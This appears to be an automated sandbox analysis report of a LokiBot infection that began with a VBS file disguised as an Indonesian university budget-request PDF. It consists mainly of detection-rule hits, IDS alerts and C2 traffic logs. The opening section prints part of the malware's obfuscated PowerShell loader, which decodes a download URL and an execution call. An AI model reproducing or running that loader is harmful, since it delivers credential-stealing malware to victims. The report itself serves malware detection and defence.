                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", ProcessId: 7352, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei T
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T07:19:12.302852+020020243121A Network Trojan was detected192.168.2.459084137.184.191.21580TCP
                2024-10-02T07:19:15.447618+020020243121A Network Trojan was detected192.168.2.459085137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T07:19:09.572345+020020253811Malware Command and Control Activity Detected192.168.2.459084137.184.191.21580TCP
                2024-10-02T07:19:12.483647+020020253811Malware Command and Control Activity Detected192.168.2.459085137.184.191.21580TCP
                2024-10-02T07:19:15.529974+020020253811Malware Command and Control Activity Detected192.168.2.459086137.184.191.21580TCP
                2024-10-02T07:19:18.355471+020020253811Malware Command and Control Activity Detected192.168.2.459087137.184.191.21580TCP
                2024-10-02T07:19:21.251872+020020253811Malware Command and Control Activity Detected192.168.2.459088137.184.191.21580TCP
                2024-10-02T07:19:24.164842+020020253811Malware Command and Control Activity Detected192.168.2.459089137.184.191.21580TCP
                2024-10-02T07:19:27.707362+020020253811Malware Command and Control Activity Detected192.168.2.459090137.184.191.21580TCP
                2024-10-02T07:19:30.551427+020020253811Malware Command and Control Activity Detected192.168.2.459091137.184.191.21580TCP
                2024-10-02T07:19:33.393218+020020253811Malware Command and Control Activity Detected192.168.2.459092137.184.191.21580TCP
                2024-10-02T07:19:36.220072+020020253811Malware Command and Control Activity Detected192.168.2.459093137.184.191.21580TCP
                2024-10-02T07:19:38.975579+020020253811Malware Command and Control Activity Detected192.168.2.459094137.184.191.21580TCP
                2024-10-02T07:19:41.723886+020020253811Malware Command and Control Activity Detected192.168.2.459095137.184.191.21580TCP
                2024-10-02T07:19:44.604525+020020253811Malware Command and Control Activity Detected192.168.2.459096137.184.191.21580TCP
                2024-10-02T07:19:47.483919+020020253811Malware Command and Control Activity Detected192.168.2.459097137.184.191.21580TCP
                2024-10-02T07:19:50.178821+020020253811Malware Command and Control Activity Detected192.168.2.459098137.184.191.21580TCP
                2024-10-02T07:19:53.593930+020020253811Malware Command and Control Activity Detected192.168.2.459099137.184.191.21580TCP
                2024-10-02T07:19:56.379219+020020253811Malware Command and Control Activity Detected192.168.2.459100137.184.191.21580TCP
                2024-10-02T07:19:59.214834+020020253811Malware Command and Control Activity Detected192.168.2.459101137.184.191.21580TCP
                2024-10-02T07:20:02.286811+020020253811Malware Command and Control Activity Detected192.168.2.459102137.184.191.21580TCP
                2024-10-02T07:20:05.122471+020020253811Malware Command and Control Activity Detected192.168.2.459103137.184.191.21580TCP
                2024-10-02T07:20:07.886272+020020253811Malware Command and Control Activity Detected192.168.2.459104137.184.191.21580TCP
                2024-10-02T07:20:10.665251+020020253811Malware Command and Control Activity Detected192.168.2.459105137.184.191.21580TCP
                2024-10-02T07:20:13.365954+020020253811Malware Command and Control Activity Detected192.168.2.459106137.184.191.21580TCP
                2024-10-02T07:20:16.194835+020020253811Malware Command and Control Activity Detected192.168.2.459107137.184.191.21580TCP
                2024-10-02T07:20:19.864465+020020253811Malware Command and Control Activity Detected192.168.2.459108137.184.191.21580TCP
                2024-10-02T07:20:22.698157+020020253811Malware Command and Control Activity Detected192.168.2.459109137.184.191.21580TCP
                2024-10-02T07:20:25.433688+020020253811Malware Command and Control Activity Detected192.168.2.459110137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T07:19:18.171666+020020243131Malware Command and Control Activity Detected192.168.2.459086137.184.191.21580TCP
                2024-10-02T07:19:21.013032+020020243131Malware Command and Control Activity Detected192.168.2.459087137.184.191.21580TCP
                2024-10-02T07:19:23.973964+020020243131Malware Command and Control Activity Detected192.168.2.459088137.184.191.21580TCP
                2024-10-02T07:19:27.548269+020020243131Malware Command and Control Activity Detected192.168.2.459089137.184.191.21580TCP
                2024-10-02T07:19:30.379725+020020243131Malware Command and Control Activity Detected192.168.2.459090137.184.191.21580TCP
                2024-10-02T07:19:33.225029+020020243131Malware Command and Control Activity Detected192.168.2.459091137.184.191.21580TCP
                2024-10-02T07:19:36.057069+020020243131Malware Command and Control Activity Detected192.168.2.459092137.184.191.21580TCP
                2024-10-02T07:19:38.828485+020020243131Malware Command and Control Activity Detected192.168.2.459093137.184.191.21580TCP
                2024-10-02T07:19:41.576277+020020243131Malware Command and Control Activity Detected192.168.2.459094137.184.191.21580TCP
                2024-10-02T07:19:44.444483+020020243131Malware Command and Control Activity Detected192.168.2.459095137.184.191.21580TCP
                2024-10-02T07:19:47.324761+020020243131Malware Command and Control Activity Detected192.168.2.459096137.184.191.21580TCP
                2024-10-02T07:19:49.999462+020020243131Malware Command and Control Activity Detected192.168.2.459097137.184.191.21580TCP
                2024-10-02T07:19:53.439974+020020243131Malware Command and Control Activity Detected192.168.2.459098137.184.191.21580TCP
                2024-10-02T07:19:56.226080+020020243131Malware Command and Control Activity Detected192.168.2.459099137.184.191.21580TCP
                2024-10-02T07:19:59.055098+020020243131Malware Command and Control Activity Detected192.168.2.459100137.184.191.21580TCP
                2024-10-02T07:20:01.880033+020020243131Malware Command and Control Activity Detected192.168.2.459101137.184.191.21580TCP
                2024-10-02T07:20:04.967633+020020243131Malware Command and Control Activity Detected192.168.2.459102137.184.191.21580TCP
                2024-10-02T07:20:07.737466+020020243131Malware Command and Control Activity Detected192.168.2.459103137.184.191.21580TCP
                2024-10-02T07:20:10.515443+020020243131Malware Command and Control Activity Detected192.168.2.459104137.184.191.21580TCP
                2024-10-02T07:20:13.220159+020020243131Malware Command and Control Activity Detected192.168.2.459105137.184.191.21580TCP
                2024-10-02T07:20:16.036940+020020243131Malware Command and Control Activity Detected192.168.2.459106137.184.191.21580TCP
                2024-10-02T07:20:19.692535+020020243131Malware Command and Control Activity Detected192.168.2.459107137.184.191.21580TCP
                2024-10-02T07:20:22.539182+020020243131Malware Command and Control Activity Detected192.168.2.459108137.184.191.21580TCP
                2024-10-02T07:20:25.272631+020020243131Malware Command and Control Activity Detected192.168.2.459109137.184.191.21580TCP
                2024-10-02T07:20:28.121264+020020243131Malware Command and Control Activity Detected192.168.2.459110137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T07:19:18.171666+020020243181Malware Command and Control Activity Detected192.168.2.459086137.184.191.21580TCP
                2024-10-02T07:19:21.013032+020020243181Malware Command and Control Activity Detected192.168.2.459087137.184.191.21580TCP
                2024-10-02T07:19:23.973964+020020243181Malware Command and Control Activity Detected192.168.2.459088137.184.191.21580TCP
                2024-10-02T07:19:27.548269+020020243181Malware Command and Control Activity Detected192.168.2.459089137.184.191.21580TCP
                2024-10-02T07:19:30.379725+020020243181Malware Command and Control Activity Detected192.168.2.459090137.184.191.21580TCP
                2024-10-02T07:19:33.225029+020020243181Malware Command and Control Activity Detected192.168.2.459091137.184.191.21580TCP
                2024-10-02T07:19:36.057069+020020243181Malware Command and Control Activity Detected192.168.2.459092137.184.191.21580TCP
                2024-10-02T07:19:38.828485+020020243181Malware Command and Control Activity Detected192.168.2.459093137.184.191.21580TCP
                2024-10-02T07:19:41.576277+020020243181Malware Command and Control Activity Detected192.168.2.459094137.184.191.21580TCP
                2024-10-02T07:19:44.444483+020020243181Malware Command and Control Activity Detected192.168.2.459095137.184.191.21580TCP
                2024-10-02T07:19:47.324761+020020243181Malware Command and Control Activity Detected192.168.2.459096137.184.191.21580TCP
                2024-10-02T07:19:49.999462+020020243181Malware Command and Control Activity Detected192.168.2.459097137.184.191.21580TCP
                2024-10-02T07:19:53.439974+020020243181Malware Command and Control Activity Detected192.168.2.459098137.184.191.21580TCP
                2024-10-02T07:19:56.226080+020020243181Malware Command and Control Activity Detected192.168.2.459099137.184.191.21580TCP
                2024-10-02T07:19:59.055098+020020243181Malware Command and Control Activity Detected192.168.2.459100137.184.191.21580TCP
                2024-10-02T07:20:01.880033+020020243181Malware Command and Control Activity Detected192.168.2.459101137.184.191.21580TCP
                2024-10-02T07:20:04.967633+020020243181Malware Command and Control Activity Detected192.168.2.459102137.184.191.21580TCP
                2024-10-02T07:20:07.737466+020020243181Malware Command and Control Activity Detected192.168.2.459103137.184.191.21580TCP
                2024-10-02T07:20:10.515443+020020243181Malware Command and Control Activity Detected192.168.2.459104137.184.191.21580TCP
                2024-10-02T07:20:13.220159+020020243181Malware Command and Control Activity Detected192.168.2.459105137.184.191.21580TCP
                2024-10-02T07:20:16.036940+020020243181Malware Command and Control Activity Detected192.168.2.459106137.184.191.21580TCP
                2024-10-02T07:20:19.692535+020020243181Malware Command and Control Activity Detected192.168.2.459107137.184.191.21580TCP
                2024-10-02T07:20:22.539182+020020243181Malware Command and Control Activity Detected192.168.2.459108137.184.191.21580TCP
                2024-10-02T07:20:25.272631+020020243181Malware Command and Control Activity Detected192.168.2.459109137.184.191.21580TCP
                2024-10-02T07:20:28.121264+020020243181Malware Command and Control Activity Detected192.168.2.459110137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T07:19:09.572345+020020216411A Network Trojan was detected192.168.2.459084137.184.191.21580TCP
                2024-10-02T07:19:12.483647+020020216411A Network Trojan was detected192.168.2.459085137.184.191.21580TCP
                2024-10-02T07:19:15.529974+020020216411A Network Trojan was detected192.168.2.459086137.184.191.21580TCP
                2024-10-02T07:19:18.355471+020020216411A Network Trojan was detected192.168.2.459087137.184.191.21580TCP
                2024-10-02T07:19:21.251872+020020216411A Network Trojan was detected192.168.2.459088137.184.191.21580TCP
                2024-10-02T07:19:24.164842+020020216411A Network Trojan was detected192.168.2.459089137.184.191.21580TCP
                2024-10-02T07:19:27.707362+020020216411A Network Trojan was detected192.168.2.459090137.184.191.21580TCP
                2024-10-02T07:19:30.551427+020020216411A Network Trojan was detected192.168.2.459091137.184.191.21580TCP
                2024-10-02T07:19:33.393218+020020216411A Network Trojan was detected192.168.2.459092137.184.191.21580TCP
                2024-10-02T07:19:36.220072+020020216411A Network Trojan was detected192.168.2.459093137.184.191.21580TCP
                2024-10-02T07:19:38.975579+020020216411A Network Trojan was detected192.168.2.459094137.184.191.21580TCP
                2024-10-02T07:19:41.723886+020020216411A Network Trojan was detected192.168.2.459095137.184.191.21580TCP
                2024-10-02T07:19:44.604525+020020216411A Network Trojan was detected192.168.2.459096137.184.191.21580TCP
                2024-10-02T07:19:47.483919+020020216411A Network Trojan was detected192.168.2.459097137.184.191.21580TCP
                2024-10-02T07:19:50.178821+020020216411A Network Trojan was detected192.168.2.459098137.184.191.21580TCP
                2024-10-02T07:19:53.593930+020020216411A Network Trojan was detected192.168.2.459099137.184.191.21580TCP
                2024-10-02T07:19:56.379219+020020216411A Network Trojan was detected192.168.2.459100137.184.191.21580TCP
                2024-10-02T07:19:59.214834+020020216411A Network Trojan was detected192.168.2.459101137.184.191.21580TCP
                2024-10-02T07:20:02.286811+020020216411A Network Trojan was detected192.168.2.459102137.184.191.21580TCP
                2024-10-02T07:20:05.122471+020020216411A Network Trojan was detected192.168.2.459103137.184.191.21580TCP
                2024-10-02T07:20:07.886272+020020216411A Network Trojan was detected192.168.2.459104137.184.191.21580TCP
                2024-10-02T07:20:10.665251+020020216411A Network Trojan was detected192.168.2.459105137.184.191.21580TCP
                2024-10-02T07:20:13.365954+020020216411A Network Trojan was detected192.168.2.459106137.184.191.21580TCP
                2024-10-02T07:20:16.194835+020020216411A Network Trojan was detected192.168.2.459107137.184.191.21580TCP
                2024-10-02T07:20:19.864465+020020216411A Network Trojan was detected192.168.2.459108137.184.191.21580TCP
                2024-10-02T07:20:22.698157+020020216411A Network Trojan was detected192.168.2.459109137.184.191.21580TCP
                2024-10-02T07:20:25.433688+020020216411A Network Trojan was detected192.168.2.459110137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T07:19:05.174518+020028032702Potentially Bad Traffic192.168.2.459082172.217.18.110443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://137.184.191.215/index.php/check.php?s=am9ntjjwVirustotal: Detection: 15%Perma Link
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsReversingLabs: Detection: 18%
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsVirustotal: Detection: 20%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:59082 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:59083 version: TLS 1.2
                Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006F2C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000001.00000002.1906613189.00000211ABE90000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1903510778.00000211ABC2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2720499502.0000000008100000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006FEC000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59085 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59085 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:59085 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59084 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59093 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59093 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59093 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59093 -> 137.184.191.215:80
